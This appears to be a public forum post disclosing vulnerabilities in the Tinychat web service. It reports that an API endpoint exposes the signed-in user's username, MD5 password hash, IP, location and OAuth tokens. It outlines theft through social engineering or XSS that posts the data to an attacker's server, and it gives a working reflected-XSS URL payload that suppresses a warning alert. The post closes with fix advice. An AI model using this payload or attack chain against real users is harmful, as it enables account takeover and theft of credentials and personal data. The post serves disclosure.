Disclaimer:

I am only posting this in the hopes that it gets fixed. I am not (and have never been) comfortable with reporting vulnerabilities/exploits personally.

Too many of my friends have been threatened, sued, and/or lost their jobs by trying to help increase security awareness while both responsible and non-destructive.

You are more than welcome (and encouraged) to report this vulnerability to Tinychat - hell, even try to get a bounty out of it.

Vulnerable users:

Anyone who is signed in to Tinychat - even with social media auth.

Overview:

I was looking through packets in wireshark while on Tinychat, and I came across an HTTP request

that was sent right after the flash app loaded up that looked a little strange so I took a peeksie.

It looks like it is the authentication creds for the user to start broadcasting to the room (and obviously sets up their accounts in the app).

What I DIDN'T expect to find was my username and my MD5'd password hanging out for the world to see (providing they had the same session as me).

Upon closer inspection I also came to find out that they store the username and password in a cookie and use that as the session identifier for the account....

...Which means that even if we can't find their unencrypted passwords we can still get on their accounts and pull any information we can get which includes:

Username

MD5 of password

IP (which means we could also find out their rough location for SE purposes)

Twitter

oAuth token (if attached to account)

Name

ID

Facebook

oAuth token (if attached to account)

Name

ID

...Actually, why don't you just take a look (I made it look pretty).

<response

referer=''

result='OK'

time='**************TIMESTAMP**************'

name='tinychat^netsec'

roomtype='default'

rtmp='rtmp://69.65.43.160:443/tinyconf'

cip='**************User IP Here**************'

rt='**************'>

<userinfo

id="**************"

added="**************"

description=""

facebook_id=""

facebook_name=""

facebook_session=""

greenroom=""

is_male="1"

location=""

loggedin="1"

myspace_id=""

myspace_session=""

password="**************MD5 OF PASSWORD**************"

showmods=""

twfb="0"

twitter_id=""

twitter_name=""

twitter_token=""

twitter_token_secret=""

username="**************"

website="" />

<geoip

area_code="**************"

city="**************"

continent_code="NA"

country="USA"

country_name="United States"

latitude="**************"

longitude="**************"

metro_code="**************"

postal_code="**************"

region="**************"

region_name="**************"

time_zone="America/New_York" />

</response>

Attack method(s):

1. The social engineer

Simply trick the user into copy/pasting the contents of the "vulnerable" page into a textbox, parsing out the desired values, and posting to your server to play with later.

2. The XSS

Find an XSS on the site and XHR to the "vulnerable" page, parse out the desired values, and postback to your server.

URL:

GET: http://tinychat.com/api/find.room/{ROOM_NAME}?site=tinychat

Example: http://tinychat.com/api/find.room/netsec?site=tinychat

!!B-B-B-B-BONUS STAGE!!:

XSS (works in everything except Chrome - damn that XSS filter! :P ):

http://tinychat.com/embedmaker.html?room="/>Netsec.<script> function generate_embed(){ /* SEE NOTE BELOW */ } alert(0);</script>

Note: We define the generate_embed() function to disable the "Only alphanumeric characters allowed" alert which may let the user know that they are visiting a malicious URL.

So there we have it, /r/netsec/. Now we just need to use attack method #2 and we've got the users username, md5 of their pass, and any other information in the response listed above.

Since Tinychat now offers a paid service for HD video and other small UI enhancements this is kind of stupid that they wouldn't secure their shit.

...Then again I might just be being an asshole.

For Tinychat staff that may or may not read this:

Remove ALL portions of your code that output their account information. This includes a few URL's in your /api/ directory and also the username and password cookies.

It took me under a minute to find the XSS listed above - I'm sure there are more of them.

Thanks for reading, fellas.